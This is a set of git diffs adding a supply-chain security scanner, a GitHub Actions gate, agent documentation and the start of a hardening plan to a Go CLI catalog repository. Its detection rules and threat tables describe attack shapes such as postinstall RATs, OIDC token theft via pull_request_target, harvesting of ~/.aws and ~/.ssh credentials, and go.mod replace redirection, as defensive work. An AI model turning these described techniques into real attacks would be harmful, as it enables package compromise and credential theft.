+    Diff-aware: fires only on newly-introduced overrides.
     """
     if not is_workflow(change.path) or change.head_content is None:
         return []
 
     findings: list[Finding] = []
-    for match in _GO_ENV_OVERRIDE.finditer(change.head_content):
-        line = change.head_content.count("\n", 0, match.start()) + 1
+    for line_no, line_content in _lines_to_scan(change):
+        match = _GO_ENV_OVERRIDE.match(line_content)
+        if not match:
+            continue
         var = match.group(1)
         findings.append(
             Finding(
                 path=change.path,
-                line=line,
+                line=line_no,
                 severity="block",
                 signal_id="go_env_override_in_workflow",
                 message=(

--- a/.github/scripts/verify-supply-chain/signals.py
+++ b/.github/scripts/verify-supply-chain/signals.py
@@ -204,10 +204,21 @@ def signal_id_token_outside_allowlist(change: FileChange) -> list[Finding]:
 # ---------------------------------------------------------------------------
 
 
-# Captures: `replace <module> => <target>` and `replace <module> <version> => <target> [<version>]`
+# Captures the single-line form: `replace <module> [<version>] => <target> [<version>]`
 _REPLACE_LINE = re.compile(
     r"^\s*replace\s+\S+(?:\s+v\S+)?\s*=>\s*(?P<target>\S+)"
 )
+
+# Captures the inner body of a block-form replace, which appears as
+# `<module> [<version>] => <target> [<version>]` *without* a leading `replace`
+# keyword. Only valid inside a `replace ( ... )` block — see _replace_block_ranges.
+_REPLACE_BLOCK_BODY = re.compile(
+    r"^\s*\S+(?:\s+v\S+)?\s*=>\s*(?P<target>\S+)"
+)
+
+# Opens a block-form replace: `replace (` possibly followed by whitespace/comment.
+_REPLACE_BLOCK_OPEN = re.compile(r"^\s*replace\s*\(\s*(?:\s*//.*)?$")
+_REPLACE_BLOCK_CLOSE = re.compile(r"^\s*\)\s*(?:\s*//.*)?$")
 
 
 def _classify_replace_target(target: str) -> str:
@@ -227,20 +238,60 @@ def _classify_replace_target(target: str) -> str:
     return "local"  # conservative
 
 
+def _replace_block_ranges(content: str | None) -> list[tuple[int, int]]:
+    """Return [(start_line, end_line)] (1-indexed, inclusive) for each
+    `replace ( ... )` block in go.mod content. start_line is the line AFTER
+    the opening `replace (`; end_line is the line BEFORE the closing `)`.
+    """
+    if not content:
+        return []
+    ranges: list[tuple[int, int]] = []
+    lines = content.splitlines()
+    i = 0
+    while i < len(lines):
+        if _REPLACE_BLOCK_OPEN.match(lines[i]):
+            start = i + 2  # first body line (1-indexed)
+            j = i + 1
+            while j < len(lines) and not _REPLACE_BLOCK_CLOSE.match(lines[j]):
+                j += 1
+            ranges.append((start, j))  # j is 1-indexed close-line-minus-1 (== j in 0-indexed)
+            i = j + 1
+        else:
+            i += 1
+    return ranges
+
+
+def _in_block(line_no: int, ranges: list[tuple[int, int]]) -> bool:
+    return any(start <= line_no <= end for start, end in ranges)
+
+
 def signal_gomod_replace(change: FileChange) -> list[Finding]:
     """R3. New `replace` directives in library/**/go.mod. Tiered:
       - remote target → block (BufferZoneCorp redirect-to-attacker-fork shape).
       - local target  → advise (legitimate vendoring, but still worth a look).
+
+    Catches BOTH go.mod replace syntaxes:
+      replace foo => bar v1.0.0                          (single-line form)
+      replace (                                          (block form — the
+          foo => bar v1.0.0                               inner lines have
+      )                                                   no `replace` prefix)
     """
     if not is_library_gomod(change.path):
         return []
 
+    block_ranges = _replace_block_ranges(change.head_content)
     findings: list[Finding] = []
     for line_no, line_content in change.added_lines:
-        match = _REPLACE_LINE.match(line_content)
-        if not match:
+        target: str | None = None
+        single_match = _REPLACE_LINE.match(line_content)
+        if single_match:
+            target = single_match.group("target")
+        elif _in_block(line_no, block_ranges):
+            body_match = _REPLACE_BLOCK_BODY.match(line_content)
+            if body_match:
+                target = body_match.group("target")
+        if target is None:
             continue
-        target = match.group("target")
         kind = _classify_replace_target(target)
         if kind == "remote":
             findings.append(

--- a/.github/scripts/verify-supply-chain/signals.py
+++ b/.github/scripts/verify-supply-chain/signals.py
@@ -474,8 +474,8 @@ def signal_npm_lifecycle_script(change: FileChange) -> list[Finding]:
         except (json.JSONDecodeError, TypeError):
             base_data = {}
 
-    head_scripts = head_data.get("scripts", {}) if isinstance(head_data, dict) else {}
-    base_scripts = base_data.get("scripts", {}) if isinstance(base_data, dict) else {}
+    head_scripts = (head_data.get("scripts") or {}) if isinstance(head_data, dict) else {}
+    base_scripts = (base_data.get("scripts") or {}) if isinstance(base_data, dict) else {}
 
     findings: list[Finding] = []
     for name in _WATCHED_NPM_SCRIPTS:

--- a/.github/scripts/verify-supply-chain/signals.py
+++ b/.github/scripts/verify-supply-chain/signals.py
@@ -551,19 +551,41 @@ def signal_module_path_drift(change: FileChange) -> list[Finding]:
             ]
         return []
 
-    # Existing CLI: module must not change to a non-canonical value.
-    if head_module != base_module and not head_module.startswith(CANONICAL_MODULE_PREFIX):
+    # Existing CLI: ANY module-directive change blocks. Catches both:
+    #   1. Drift outside the canonical prefix (the original BufferZoneCorp
+    #      shape — module redirected to attacker fork).
+    #   2. Within-canonical-prefix renames (e.g., kalshi → kalshi-evil) that
+    #      still start with github.com/mvanhorn/printing-press-library/library/
+    #      but redirect `go install` to a different slug. Self-evident in PR
+    #      review for humans, but worth blocking mechanically since renames
+    #      of published CLIs are generator-pipeline operations, not manual
+    #      go.mod edits.
+    if head_module != base_module:
+        outside_canonical = not head_module.startswith(CANONICAL_MODULE_PREFIX)
+        if outside_canonical:
+            message = (
+                "module directive on an existing library CLI changed from %s "
+                "to %s, which is outside the canonical prefix %s. This silently "
+                "redirects `go install` for every user."
+                % (base_module, head_module, CANONICAL_MODULE_PREFIX)
+            )
+            signal_id = "module_path_drift_on_existing_cli"
+        else:
+            message = (
+                "module directive on an existing library CLI changed from %s "
+                "to %s. Even within the canonical prefix, renaming a published "
+                "CLI redirects `go install` for users pinned to the old slug — "
+                "this must go through the generator pipeline, not a manual edit."
+                % (base_module, head_module)
+            )
+            signal_id = "module_path_rename_on_existing_cli"
         return [
             Finding(
                 path=change.path,
                 line=_find_line(change.head_content, head_module),
                 severity="block",
-                signal_id="module_path_drift_on_existing_cli",
-                message=(
-                    "module directive on an existing library CLI changed from %s "
-                    "to %s, which is outside the canonical prefix %s. This silently "
-                    "redirects `go install` for every user." % (base_module, head_module, CANONICAL_MODULE_PREFIX)
-                ),
+                signal_id=signal_id,
+                message=message,
                 remediation=(
                     "Revert the module directive. Renaming or moving a published CLI "
                     "is a generator-repo operation, not a manual go.mod edit."

--- a/.github/workflows/verify-supply-chain.yml
+++ b/.github/workflows/verify-supply-chain.yml
@@ -70,10 +70,24 @@ jobs:
           git remote add pr "https://github.com/${HEAD_REPO}.git" 2>/dev/null || git remote set-url pr "https://github.com/${HEAD_REPO}.git"
           git fetch --no-tags --depth=200 pr "${HEAD_SHA}"
 
-          # Bootstrap case: base branch has no scanner yet (we're the PR
-          # introducing it). Restore the scanner files from PR head so the
-          # gate can run at all. Once this PR merges, the base will carry
-          # the trusted scanner and this fallback becomes a no-op.
+          # Deletion guard: refuse to bootstrap-or-run if the PR deletes
+          # scanner files. Closes the staged two-step attack (Greptile P1):
+          # PR-1 deletes scan.py from main → PR-2 re-introduces a patched
+          # scan.py → bootstrap fallback runs the patched scanner against
+          # PR-2's payload. Blocking PR-1 here prevents the chain.
+          # Compares base (HEAD after checkout) vs the PR head SHA.
+          deleted_scanner=$(git diff --name-status --diff-filter=D HEAD "${HEAD_SHA}" -- .github/scripts/verify-supply-chain/ || true)
+          if [ -n "${deleted_scanner}" ]; then
+            echo "::error::PR deletes supply-chain scanner files. Removing or relocating the scanner requires explicit out-of-band review — automated gate refuses to proceed. Files: ${deleted_scanner}"
+            exit 1
+          fi
+
+          # Bootstrap case: base has no scanner yet (this PR introduces it).
+          # Restore the scanner files from PR head so the gate can run at
+          # all. Once this PR merges, the base will carry the trusted
+          # scanner and this fallback becomes a no-op. The deletion guard
+          # above ensures the only way to enter this branch is the genuine
+          # first-introduction case.
           if [ ! -f .github/scripts/verify-supply-chain/scan.py ]; then
             echo "::notice::Base branch has no scanner — bootstrap mode, restoring scanner from PR head ${HEAD_SHA}."
             mkdir -p .github/scripts/verify-supply-chain

--- a/.github/workflows/verify-supply-chain.yml
+++ b/.github/workflows/verify-supply-chain.yml
@@ -5,6 +5,13 @@ name: Verify supply chain
 # + OIDC theft), node-ipc (credential harvesting), BufferZoneCorp (Go module
 # replace redirection). Sister doc: docs/solutions/security/2026-05-supply-chain-hardening.md.
 #
+# IMPORTANT — scan integrity: this workflow checks out the BASE branch (not
+# the PR head) so the scan.py / signals.py that execute are the trusted base
+# versions, not whatever the PR author shipped. The PR head is fetched as a
+# separate ref and passed to the scanner via --head-ref. This prevents a PR
+# from weakening the scan logic in the same change that introduces an attack
+# payload — relevant once this check is promoted to a required gate.
+#
 # This workflow is informational on landing — promote to a required check
 # via branch protection only after a one-week green window confirms no
 # false-positive miscalibration on real PRs (per the plan's KD7).
@@ -38,28 +45,33 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 5
     steps:
+      # Checkout the BASE branch from the base repo — never the PR head. The
+      # scan scripts that execute below are therefore the trusted base
+      # versions. fork PRs cannot weaken scan.py to bypass detection.
       - uses: actions/checkout@v6
         with:
-          repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }}
-          ref: ${{ github.event.pull_request.head.ref || github.ref }}
+          repository: ${{ github.repository }}
+          ref: ${{ github.base_ref || github.ref }}
           fetch-depth: 0
           persist-credentials: false
 
       - name: Run supply-chain scan
         if: github.event_name == 'pull_request'
         env:
-          BASE_REF: ${{ github.base_ref }}
-          BASE_REPO: ${{ github.repository }}
+          HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
+          HEAD_SHA: ${{ github.event.pull_request.head.sha }}
         run: |
           set -euo pipefail
 
-          git remote add base "https://github.com/${BASE_REPO}.git" 2>/dev/null || git remote set-url base "https://github.com/${BASE_REPO}.git"
-          base_remote_ref="refs/remotes/base/${BASE_REF}"
-          if ! git show-ref --verify --quiet "${base_remote_ref}"; then
-            git fetch --no-tags base "${BASE_REF}:${base_remote_ref}"
-          fi
+          # Fetch the PR head SHA into the local repo as a detached ref. We
+          # never check it out — scan.py reads file contents via `git show
+          # <head_sha>:<path>`, which doesn't require working-tree checkout.
+          git remote add pr "https://github.com/${HEAD_REPO}.git" 2>/dev/null || git remote set-url pr "https://github.com/${HEAD_REPO}.git"
+          git fetch --no-tags --depth=200 pr "${HEAD_SHA}"
 
-          python3 .github/scripts/verify-supply-chain/scan.py --base-ref "${base_remote_ref}"
+          # base-ref = HEAD (the base branch we checked out)
+          # head-ref = the fetched PR head SHA
+          python3 .github/scripts/verify-supply-chain/scan.py --base-ref HEAD --head-ref "${HEAD_SHA}"
 
       - name: Run supply-chain scan (manual dispatch)
         if: github.event_name == 'workflow_dispatch'

--- a/.github/workflows/verify-supply-chain.yml
+++ b/.github/workflows/verify-supply-chain.yml
@@ -69,6 +69,16 @@ jobs:
           git remote add pr "https://github.com/${HEAD_REPO}.git" 2>/dev/null || git remote set-url pr "https://github.com/${HEAD_REPO}.git"
           git fetch --no-tags --depth=200 pr "${HEAD_SHA}"
 
+          # Bootstrap case: base branch has no scanner yet (we're the PR
+          # introducing it). Restore the scanner files from PR head so the
+          # gate can run at all. Once this PR merges, the base will carry
+          # the trusted scanner and this fallback becomes a no-op.
+          if [ ! -f .github/scripts/verify-supply-chain/scan.py ]; then
+            echo "::notice::Base branch has no scanner — bootstrap mode, restoring scanner from PR head ${HEAD_SHA}."
+            mkdir -p .github/scripts/verify-supply-chain
+            git restore --source="${HEAD_SHA}" --worktree -- .github/scripts/verify-supply-chain/
+          fi
+
           # base-ref = HEAD (the base branch we checked out)
           # head-ref = the fetched PR head SHA
           python3 .github/scripts/verify-supply-chain/scan.py --base-ref HEAD --head-ref "${HEAD_SHA}"

--- a/.github/workflows/verify-supply-chain.yml
+++ b/.github/workflows/verify-supply-chain.yml
@@ -1,0 +1,75 @@
+name: Verify supply chain
+
+# PR-time gate against supply-chain attack shapes observed in May 2026:
+# Axios (npm postinstall RAT), TanStack mini-Shai-Hulud (pull_request_target
+# + OIDC theft), node-ipc (credential harvesting), BufferZoneCorp (Go module
+# replace redirection). Sister doc: docs/solutions/security/2026-05-supply-chain-hardening.md.
+#
+# This workflow is informational on landing — promote to a required check
+# via branch protection only after a one-week green window confirms no
+# false-positive miscalibration on real PRs (per the plan's KD7).
+
+on:
+  pull_request:
+    paths:
+      - '.github/workflows/**'
+      - '.github/scripts/verify-supply-chain/**'
+      - 'library/**/go.mod'
+      - 'library/**/go.sum'
+      - 'npm/package.json'
+      - 'npm/package-lock.json'
+  workflow_dispatch:
+    inputs:
+      strict:
+        description: 'Promote advisory findings to block-severity'
+        required: false
+        default: 'false'
+
+permissions:
+  contents: read
+
+concurrency:
+  group: verify-supply-chain-${{ github.event.pull_request.number || github.run_id }}
+  cancel-in-progress: true
+
+jobs:
+  scan:
+    name: Scan
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    steps:
+      - uses: actions/checkout@v6
+        with:
+          repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }}
+          ref: ${{ github.event.pull_request.head.ref || github.ref }}
+          fetch-depth: 0
+          persist-credentials: false
+
+      - name: Run supply-chain scan
+        if: github.event_name == 'pull_request'
+        env:
+          BASE_REF: ${{ github.base_ref }}
+          BASE_REPO: ${{ github.repository }}
+        run: |
+          set -euo pipefail
+
+          git remote add base "https://github.com/${BASE_REPO}.git" 2>/dev/null || git remote set-url base "https://github.com/${BASE_REPO}.git"
+          base_remote_ref="refs/remotes/base/${BASE_REF}"
+          if ! git show-ref --verify --quiet "${base_remote_ref}"; then
+            git fetch --no-tags base "${BASE_REF}:${base_remote_ref}"
+          fi
+
+          python3 .github/scripts/verify-supply-chain/scan.py --base-ref "${base_remote_ref}"
+
+      - name: Run supply-chain scan (manual dispatch)
+        if: github.event_name == 'workflow_dispatch'
+        env:
+          STRICT: ${{ inputs.strict }}
+        run: |
+          set -euo pipefail
+
+          if [ "${STRICT}" = "true" ]; then
+            python3 .github/scripts/verify-supply-chain/scan.py --base-ref origin/main --strict
+          else
+            python3 .github/scripts/verify-supply-chain/scan.py --base-ref origin/main
+          fi

--- a/.github/workflows/verify-supply-chain.yml
+++ b/.github/workflows/verify-supply-chain.yml
@@ -18,13 +18,14 @@ name: Verify supply chain
 
 on:
   pull_request:
+    # Trigger only on paths that have associated scan signals — go.sum and
+    # package-lock.json don't, and including them produces no-op runs on
+    # routine `go mod tidy` / `npm install` commits (Greptile-flagged).
     paths:
       - '.github/workflows/**'
       - '.github/scripts/verify-supply-chain/**'
       - 'library/**/go.mod'
-      - 'library/**/go.sum'
       - 'npm/package.json'
-      - 'npm/package-lock.json'
   workflow_dispatch:
     inputs:
       strict:

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -136,17 +136,9 @@ The same expectation applies to non-CLI PRs (CI fixes, bug fixes, doc edits, swe
 
 ## Supply-chain hardening
 
-PRs are scanned for the attack shapes observed in four May 2026 incidents: Axios (compromised npm account + phantom dependency with `postinstall` RAT), TanStack mini-Shai-Hulud (`pull_request_target` + PR-head checkout → OIDC theft), node-ipc (expired-domain account takeover + obfuscated credential harvesting), and BufferZoneCorp (sleeper Go modules with `replace` redirection and `GOPROXY` tampering). See [docs/solutions/security/2026-05-supply-chain-hardening.md](docs/solutions/security/2026-05-supply-chain-hardening.md) for incident timeline and primary-source citations.
+PRs touching `.github/workflows/**`, `library/**/go.mod`, or `npm/package.json` are gated by two layers: Greptile rules in [`greptile.json`](greptile.json) and a Python scan in [`.github/scripts/verify-supply-chain/`](.github/scripts/verify-supply-chain/) run by `verify-supply-chain.yml`. See those files for current signal coverage. Run the scan locally with `python3 .github/scripts/verify-supply-chain/scan.py --base-ref origin/main`; tests are `python3 -m unittest scan_test` from that directory.
 
-Two layers run on every PR:
-
-1. **Greptile rules** in `greptile.json` — judgment-heavy review across `.github/workflows/**`, `library/**/go.mod`, `library/**/internal/**/*.go`, `library/**/cmd/**/*.go`, and `npm/package.json`. Rules cover workflow trust (`pull_request_target` + PR-head checkout, `id-token: write` outside the `npm-publish.yml` allowlist), Go-module supply chain (`replace` directive tiering, `GOPROXY`/`GOFLAGS`/`GONOSUMCHECK` overrides, `module` directive drift on existing CLIs), the npm wrapper (`postinstall`/`preinstall`/`prepare` script additions), and Go-source credential reads in CLIs whose purpose doesn't explain them. Greptile findings post as P0 / P1 comments with rationale.
-
-2. **`verify-supply-chain.yml`** — deterministic Python scan at [.github/scripts/verify-supply-chain/scan.py](.github/scripts/verify-supply-chain/scan.py) runs on every PR that touches the scoped paths. Hard-fails on mechanical block-tier signals (TanStack PR-head-checkout shape, BufferZoneCorp `replace`-to-remote shape, Axios npm lifecycle hook, etc.). Local-path `replace` directives are advisory only — `library/food-and-dining/ordertogo/go.mod` has three legitimate ones today. Run locally with `python3 .github/scripts/verify-supply-chain/scan.py --base-ref origin/main`; tests live next to the script (`python3 -m unittest scan_test`).
-
-This workflow runs informationally on landing. Promote to a required check via branch protection only after a one-week green window confirms no false-positive miscalibration on real PRs.
-
-The same shape mirrors into `mvanhorn/cli-printing-press` (the generator repo) with scope adaptations — no npm wrapper there, no published-CLI module paths, but the workflow-trust and Go-module rules apply identically.
+Runs informationally on landing — promote to a required branch-protection check only after a one-week green window. Mirror gate runs in [`mvanhorn/cli-printing-press`](https://github.com/mvanhorn/cli-printing-press) with scope adaptations. Incident background and primary sources: [docs/solutions/security/2026-05-supply-chain-hardening.md](docs/solutions/security/2026-05-supply-chain-hardening.md).
 
 ## Repository layout
 

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -134,6 +134,20 @@ If you (an agent) opened the PR, you own driving it to ready-to-merge:
 
 The same expectation applies to non-CLI PRs (CI fixes, bug fixes, doc edits, sweep-canonical runs): resolve every comment before merge. The strictness is uniform; the rule-set Greptile applies varies with what you touched.
 
+## Supply-chain hardening
+
+PRs are scanned for the attack shapes observed in four May 2026 incidents: Axios (compromised npm account + phantom dependency with `postinstall` RAT), TanStack mini-Shai-Hulud (`pull_request_target` + PR-head checkout → OIDC theft), node-ipc (expired-domain account takeover + obfuscated credential harvesting), and BufferZoneCorp (sleeper Go modules with `replace` redirection and `GOPROXY` tampering). See [docs/solutions/security/2026-05-supply-chain-hardening.md](docs/solutions/security/2026-05-supply-chain-hardening.md) for incident timeline and primary-source citations.
+
+Two layers run on every PR:
+
+1. **Greptile rules** in `greptile.json` — judgment-heavy review across `.github/workflows/**`, `library/**/go.mod`, `library/**/internal/**/*.go`, `library/**/cmd/**/*.go`, and `npm/package.json`. Rules cover workflow trust (`pull_request_target` + PR-head checkout, `id-token: write` outside the `npm-publish.yml` allowlist), Go-module supply chain (`replace` directive tiering, `GOPROXY`/`GOFLAGS`/`GONOSUMCHECK` overrides, `module` directive drift on existing CLIs), the npm wrapper (`postinstall`/`preinstall`/`prepare` script additions), and Go-source credential reads in CLIs whose purpose doesn't explain them. Greptile findings post as P0 / P1 comments with rationale.
+
+2. **`verify-supply-chain.yml`** — deterministic Python scan at [.github/scripts/verify-supply-chain/scan.py](.github/scripts/verify-supply-chain/scan.py) runs on every PR that touches the scoped paths. Hard-fails on mechanical block-tier signals (TanStack PR-head-checkout shape, BufferZoneCorp `replace`-to-remote shape, Axios npm lifecycle hook, etc.). Local-path `replace` directives are advisory only — `library/food-and-dining/ordertogo/go.mod` has three legitimate ones today. Run locally with `python3 .github/scripts/verify-supply-chain/scan.py --base-ref origin/main`; tests live next to the script (`python3 -m unittest scan_test`).
+
+This workflow runs informationally on landing. Promote to a required check via branch protection only after a one-week green window confirms no false-positive miscalibration on real PRs.
+
+The same shape mirrors into `mvanhorn/cli-printing-press` (the generator repo) with scope adaptations — no npm wrapper there, no published-CLI module paths, but the workflow-trust and Go-module rules apply identically.
+
 ## Repository layout
 
 ```

--- a/docs/plans/2026-05-17-001-feat-supply-chain-hardening-plan.html
+++ b/docs/plans/2026-05-17-001-feat-supply-chain-hardening-plan.html
@@ -1,0 +1,823 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<title>feat: supply-chain hardening for printing-press-library and cli-printing-press</title>
+<meta name="created" content="2026-05-17">
+<meta name="status" content="active">
+<meta name="origin" content="solo invocation (no upstream brainstorm)">
+<meta name="depth" content="standard-with-deep-extensions">
+<style>
+  :root {
+    --fg: #1a1a1a;
+    --muted: #555;
+    --accent: #1f5fbb;
+    --warn: #b15800;
+    --danger: #a4282d;
+    --ok: #1f6b3a;
+    --border: #d4d4d4;
+    --bg-alt: #f7f7f8;
+    --bg-code: #f3f3f5;
+    --bg-callout: #f0f6ff;
+    --bg-defer: #fff8ec;
+  }
+  * { box-sizing: border-box; }
+  html { font-size: 15px; }
+  body {
+    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif;
+    color: var(--fg);
+    max-width: 56rem;
+    margin: 1rem auto 4rem;
+    padding: 0 1.25rem;
+    line-height: 1.55;
+  }
+  header.plan-meta {
+    border-bottom: 1px solid var(--border);
+    padding-bottom: 0.75rem;
+    margin-bottom: 1.5rem;
+  }
+  header.plan-meta h1 {
+    margin: 0 0 0.5rem;
+    font-size: 1.7rem;
+    line-height: 1.25;
+  }
+  header.plan-meta dl {
+    display: grid;
+    grid-template-columns: max-content 1fr;
+    gap: 0.15rem 0.75rem;
+    margin: 0;
+    font-size: 0.9rem;
+    color: var(--muted);
+  }
+  header.plan-meta dt { font-weight: 600; }
+  header.plan-meta dd { margin: 0; }
+  h2 {
+    font-size: 1.3rem;
+    margin-top: 2.25rem;
+    padding-top: 0.5rem;
+    border-top: 1px solid var(--border);
+  }
+  h3 { font-size: 1.05rem; margin-top: 1.5rem; }
+  h4 { font-size: 0.95rem; margin-top: 1rem; color: var(--muted); }
+  code, pre {
+    font-family: "JetBrains Mono", Menlo, Consolas, monospace;
+    font-size: 0.85em;
+  }
+  code { background: var(--bg-code); padding: 0.1em 0.35em; border-radius: 3px; }
+  pre {
+    background: var(--bg-code);
+    border: 1px solid var(--border);
+    border-radius: 4px;
+    padding: 0.75rem 1rem;
+    overflow-x: auto;
+    line-height: 1.4;
+  }
+  pre code { background: transparent; padding: 0; }
+  table {
+    border-collapse: collapse;
+    width: 100%;
+    margin: 1rem 0;
+    font-size: 0.92rem;
+  }
+  th, td {
+    text-align: left;
+    padding: 0.5rem 0.7rem;
+    border: 1px solid var(--border);
+    vertical-align: top;
+  }
+  th { background: var(--bg-alt); font-weight: 600; }
+  tr:nth-child(even) td { background: #fafafa; }
+  ul, ol { padding-left: 1.5rem; }
+  li { margin-bottom: 0.2rem; }
+  .callout {
+    border-left: 4px solid var(--accent);
+    background: var(--bg-callout);
+    padding: 0.6rem 0.9rem;
+    margin: 1rem 0;
+    border-radius: 0 4px 4px 0;
+  }
+  .callout.warn { border-left-color: var(--warn); background: var(--bg-defer); }
+  .callout.danger { border-left-color: var(--danger); background: #fdeeef; }
+  .badge {
+    display: inline-block;
+    padding: 0.05em 0.5em;
+    border-radius: 3px;
+    font-size: 0.78rem;
+    font-weight: 600;
+    margin-right: 0.3em;
+    background: var(--bg-alt);
+    border: 1px solid var(--border);
+    color: var(--muted);
+  }
+  .badge.block { background: #fdeeef; color: var(--danger); border-color: #f3c2c4; }
+  .badge.advise { background: var(--bg-defer); color: var(--warn); border-color: #f0d9a8; }
+  .badge.ok { background: #e7f4ec; color: var(--ok); border-color: #b9dbc4; }
+  .badge.repo { background: #eaf0fb; color: var(--accent); border-color: #c1d4ed; }
+  .unit {
+    border: 1px solid var(--border);
+    border-radius: 6px;
+    padding: 0.85rem 1.15rem;
+    margin: 1.25rem 0;
+    background: #fcfcfc;
+  }
+  .unit > h3 {
+    margin-top: 0.2rem;
+    border-bottom: 1px solid var(--border);
+    padding-bottom: 0.4rem;
+  }
+  .unit .field {
+    margin: 0.35rem 0;
+  }
+  .unit .field > b { display: inline-block; min-width: 8em; }
+  .toc {
+    background: var(--bg-alt);
+    border: 1px solid var(--border);
+    border-radius: 4px;
+    padding: 0.75rem 1rem;
+    font-size: 0.9rem;
+  }
+  .toc ol { margin: 0; padding-left: 1.3rem; }
+  .anchor { color: var(--muted); text-decoration: none; margin-left: 0.3em; }
+  .anchor:hover { color: var(--accent); }
+  svg.diagram {
+    display: block;
+    margin: 1rem auto;
+    max-width: 100%;
+    height: auto;
+    border: 1px solid var(--border);
+    border-radius: 4px;
+    background: #fff;
+  }
+  .deferred {
+    background: var(--bg-defer);
+    border-left: 4px solid var(--warn);
+    padding: 0.6rem 0.9rem;
+    border-radius: 0 4px 4px 0;
+  }
+</style>
+</head>
+<body>
+
+<header class="plan-meta">
+  <h1>feat: supply-chain hardening for <code>printing-press-library</code> and <code>cli-printing-press</code></h1>
+  <dl>
+    <dt>Created:</dt><dd>2026-05-17</dd>
+    <dt>Status:</dt><dd>active</dd>
+    <dt>Depth:</dt><dd>Standard with deep extensions (security-sensitive, cross-repo)</dd>
+    <dt>Origin:</dt><dd>solo invocation; no upstream brainstorm</dd>
+    <dt>Target repos:</dt><dd><code>mvanhorn/printing-press-library</code>, <code>mvanhorn/cli-printing-press</code></dd>
+    <dt>Plan type:</dt><dd><code>feat</code></dd>
+  </dl>
+</header>
+
+<nav class="toc" aria-label="Table of contents">
+  <ol>
+    <li><a href="#summary">Summary</a></li>
+    <li><a href="#problem-frame">Problem Frame</a></li>
+    <li><a href="#scope">Scope Boundaries</a></li>
+    <li><a href="#requirements">Requirements</a></li>
+    <li><a href="#decisions">Key Technical Decisions</a></li>
+    <li><a href="#design">High-Level Technical Design</a></li>
+    <li><a href="#output">Output Structure</a></li>
+    <li><a href="#units">Implementation Units</a></li>
+    <li><a href="#acceptance">Acceptance Examples</a></li>
+    <li><a href="#risks">Risks &amp; Dependencies</a></li>
+    <li><a href="#sources">Sources &amp; Research</a></li>
+  </ol>
+</nav>
+
+<h2 id="summary">Summary <a href="#summary" class="anchor">#</a></h2>
+
+<p>Add layered supply-chain defenses to both the published catalog (<code>printing-press-library</code>) and its upstream generator (<code>cli-printing-press</code>), targeting the attack shapes observed in four real-world May 2026 incidents: Axios, TanStack mini-Shai-Hulud, node-ipc, and BufferZoneCorp.</p>
+
+<p>The defense combines two layers, applied identically across both repos:</p>
+
+<ul>
+  <li><b>Greptile rules</b> (judgment): six new entries in each repo's <code>greptile.json</code> covering GitHub Actions trust patterns, Go-module supply-chain shapes, npm-wrapper lifecycle scripts, Go-module-path drift on existing CLIs, and Go-source credential reads.</li>
+  <li><b>Deterministic Python scan</b> (mechanical hard-fail): a small script wired into a new <code>verify-supply-chain.yml</code> workflow that blocks PRs introducing the highest-confidence attack signals. Patterned after the existing <code>.github/scripts/verify-publish-package/</code> shape.</li>
+</ul>
+
+<p>The plan lands in two coordinated PRs (one per repo) by an author with admin on both, with the published-library PR merging first so false-positive calibration informs the generator-repo mirror.</p>
+
+<h2 id="problem-frame">Problem Frame <a href="#problem-frame" class="anchor">#</a></h2>
+
+<p>The <code>printing-press-library</code> repo publishes a catalog of Go CLIs (119 today) plus an npm installer wrapper (<code>@mvanhorn/printing-press</code>), and is fed by the <code>cli-printing-press</code> generator. The existing PR-time gates (<code>verify-library-conventions.yml</code>, <code>verify-skills.yml</code>, <code>govulncheck.yml</code>, Greptile review) cover canonical CLI shape and known-CVE Go dependencies. They do <em>not</em> cover supply-chain attack shapes that have hit comparable ecosystems in the last two months.</p>
+
+<h3>Concrete attack shapes to defend against</h3>
+
+<table>
+  <thead><tr><th>Incident</th><th>Vector</th><th>What it would look like in a PR here</th></tr></thead>
+  <tbody>
+    <tr><td>Axios (Mar 31, 2026)</td><td>Compromised npm account; phantom dependency (<code>plain-crypto-js</code>) with <code>postinstall</code> RAT.</td><td>A PR to <code>npm/package.json</code> adds a new dependency and a new <code>postinstall</code>/<code>preinstall</code>/<code>prepare</code> script.</td></tr>
+    <tr><td>TanStack mini-Shai-Hulud (May 11, 2026)</td><td><code>pull_request_target</code> + checkout-PR-head pattern; OIDC token extracted from runner memory; <code>id-token: write</code> abused to publish.</td><td>A PR to <code>.github/workflows/**</code> adds a <code>pull_request_target</code> workflow that checks out <code>github.event.pull_request.head.sha</code> and/or grants <code>id-token: write</code> in a non-publish workflow.</td></tr>
+    <tr><td>node-ipc (May 14, 2026)</td><td>Expired-domain account takeover; obfuscated IIFE; harvests <code>~/.aws</code>, <code>~/.ssh</code>, <code>~/.kube</code>, <code>~/.claude</code>, env tokens.</td><td>A PR to <code>library/&lt;cat&gt;/&lt;slug&gt;/internal/**/*.go</code> adds code reading home-dir credential paths or sensitive env vars.</td></tr>
+    <tr><td>BufferZoneCorp (May 2026)</td><td>Sleeper Go modules; <code>replace</code> directives redirect to attacker forks; <code>GOPROXY</code>/<code>GONOSUMCHECK</code> overrides in CI.</td><td>A PR to <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code> adds a <code>replace</code> directive pointing at a remote URL, or a workflow exports <code>GOPROXY</code>/<code>GOFLAGS</code>/<code>GONOSUMCHECK</code>. Or the <code>module</code> line on an existing CLI is rewritten to a non-canonical path so <code>go install</code> resolves to an attacker-controlled module.</td></tr>
+  </tbody>
+</table>
+
+<h3>Current state audit (origin/main, both repos)</h3>
+
+<p>Performed on <time>2026-05-17</time> against fresh <code>origin/main</code> fetches. Findings:</p>
+
+<ul>
+  <li><span class="badge ok">SAFE</span> <code>printing-press-library</code> has exactly one <code>pull_request_target</code> workflow (<code>.github/workflows/greptile-policy-gate.yml</code>). Permissions are <code>checks: read</code>, <code>contents: read</code>, <code>issues: write</code>, <code>pull-requests: write</code>; it does <em>not</em> check out PR head code and does <em>not</em> grant <code>id-token</code>. It only makes API calls.</li>
+  <li><span class="badge ok">SAFE</span> <code>printing-press-library</code> grants <code>id-token: write</code> only in <code>.github/workflows/npm-publish.yml</code>, the OIDC Trusted Publishing job for the npm wrapper. This is the recommended posture.</li>
